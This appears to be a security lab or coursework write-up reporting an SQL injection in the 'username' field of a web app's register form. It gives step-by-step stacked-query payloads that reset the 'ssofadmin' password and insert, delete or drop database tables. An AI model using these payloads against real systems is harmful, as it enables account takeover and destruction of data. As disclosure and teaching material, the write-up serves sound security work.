# Vulnerability 2: SQL injection in parameter `username`

- Vulnerability: SQL injection
- Where: `username` parameter of register
- Impact: Allows execution of any query on the database, in the POC we will login as `ssofadmin`

## Steps to reproduce

1. Insert `username` = `'; UPDATE Users SET password='a' WHERE username='ssofadmin'; DROP table posts # ` and `password`=`anything` in register form
2. Login as `username`=`ssofadmin` and password=`a` you will have full access to `ssofadmin`'s account

[(POC)](vuln2.py)

**Note:** The last instruction of the payload `DROP table posts` is needed for the query to be executed but is not actually performed by the database because table `posts` doesn't exist

## Other Payloads:
Examples of queries of each type:
- INSERT query: `username`=`'; INSERT INTO Friends(username1, username2) VALUES ('a', 'b'); DROP table posts ` (add username `a` as friend of username `b`), exemplified in [request_friend #1](../request_friend_vulns/vuln1.md))
- DELETE query: `username`=`'; DELETE FROM Posts; DROP table posts # ` (deletes all entries for table Posts), exemplified with similar payload in [register #3](vuln3.md))
- DROP query: `username`=`'; DROP table Posts; DROP table posts # `(drops table Posts), exemplified in [pending_requests #1](../pending_requests_vulns/vuln1.md))
